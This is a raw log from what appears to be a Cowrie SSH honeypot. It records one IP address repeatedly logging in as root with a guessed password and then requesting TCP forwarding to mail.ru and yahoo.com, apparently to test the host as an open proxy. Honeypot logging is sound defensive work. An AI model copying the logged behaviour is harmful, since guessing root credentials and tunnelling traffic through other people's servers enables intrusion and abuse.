{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.522887Z","src_ip":"77.83.207.83","session":"42c3684bf1da"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.776193Z","src_ip":"77.83.207.83","session":"42c3684bf1da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":19723,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:19723","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.827741Z","session":"42c3684bf1da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.878696Z","src_ip":"77.83.207.83","session":"42c3684bf1da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23431,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23431","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.021324Z","session":"42c3684bf1da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.072320Z","src_ip":"77.83.207.83","session":"42c3684bf1da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":19304,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19304","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.217211Z","session":"42c3684bf1da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.268022Z","src_ip":"77.83.207.83","session":"42c3684bf1da"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.319628Z","src_ip":"77.83.207.83","session":"42c3684bf1da"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37975,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a99b2f5612c","protocol":"ssh","message":"New connection: 77.83.207.83:37975 (1.2.3.4:22) [session: 0a99b2f5612c]","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.368455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.369737Z","src_ip":"77.83.207.83","session":"0a99b2f5612c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.419954Z","src_ip":"77.83.207.83","session":"0a99b2f5612c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.668387Z","src_ip":"77.83.207.83","session":"0a99b2f5612c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17512,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17512","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.719747Z","session":"0a99b2f5612c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.769614Z","src_ip":"77.83.207.83","session":"0a99b2f5612c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":5279,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:5279","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.912065Z","session":"0a99b2f5612c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:04.962005Z","src_ip":"77.83.207.83","session":"0a99b2f5612c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":18471,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18471","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.104353Z","session":"0a99b2f5612c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.154176Z","src_ip":"77.83.207.83","session":"0a99b2f5612c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.205026Z","src_ip":"77.83.207.83","session":"0a99b2f5612c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38021,"dst_ip":"1.2.3.4","dst_port":22,"session":"94ecb6232974","protocol":"ssh","message":"New connection: 77.83.207.83:38021 (1.2.3.4:22) [session: 94ecb6232974]","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.253700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.254628Z","src_ip":"77.83.207.83","session":"94ecb6232974"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.304458Z","src_ip":"77.83.207.83","session":"94ecb6232974"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.552885Z","src_ip":"77.83.207.83","session":"94ecb6232974"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8878,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8878","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.603853Z","session":"94ecb6232974"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.653919Z","src_ip":"77.83.207.83","session":"94ecb6232974"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":13012,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13012","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.796037Z","session":"94ecb6232974"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.845840Z","src_ip":"77.83.207.83","session":"94ecb6232974"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":13645,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13645","sensor":"my-vps","timestamp":"2025-08-31T03:44:05.988333Z","session":"94ecb6232974"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.038221Z","src_ip":"77.83.207.83","session":"94ecb6232974"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.089601Z","src_ip":"77.83.207.83","session":"94ecb6232974"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38095,"dst_ip":"1.2.3.4","dst_port":22,"session":"011064bee7a3","protocol":"ssh","message":"New connection: 77.83.207.83:38095 (1.2.3.4:22) [session: 011064bee7a3]","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.138414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.139411Z","src_ip":"77.83.207.83","session":"011064bee7a3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.189332Z","src_ip":"77.83.207.83","session":"011064bee7a3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.437891Z","src_ip":"77.83.207.83","session":"011064bee7a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28174,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28174","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.489361Z","session":"011064bee7a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.539419Z","src_ip":"77.83.207.83","session":"011064bee7a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":4130,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4130","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.680338Z","session":"011064bee7a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.730780Z","src_ip":"77.83.207.83","session":"011064bee7a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":20689,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20689","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.872575Z","session":"011064bee7a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.922557Z","src_ip":"77.83.207.83","session":"011064bee7a3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:06.973479Z","src_ip":"77.83.207.83","session":"011064bee7a3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38170,"dst_ip":"1.2.3.4","dst_port":22,"session":"d726b99afcb8","protocol":"ssh","message":"New connection: 77.83.207.83:38170 (1.2.3.4:22) [session: d726b99afcb8]","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.024419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.025200Z","src_ip":"77.83.207.83","session":"d726b99afcb8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.076440Z","src_ip":"77.83.207.83","session":"d726b99afcb8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.333022Z","src_ip":"77.83.207.83","session":"d726b99afcb8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26936,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26936","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.385522Z","session":"d726b99afcb8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.436915Z","src_ip":"77.83.207.83","session":"d726b99afcb8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":8592,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8592","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.581697Z","session":"d726b99afcb8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.633167Z","src_ip":"77.83.207.83","session":"d726b99afcb8"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.711537Z","src_ip":"212.227.125.160","session":"e68a1236e586"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":7086,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7086","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.777624Z","session":"d726b99afcb8"}
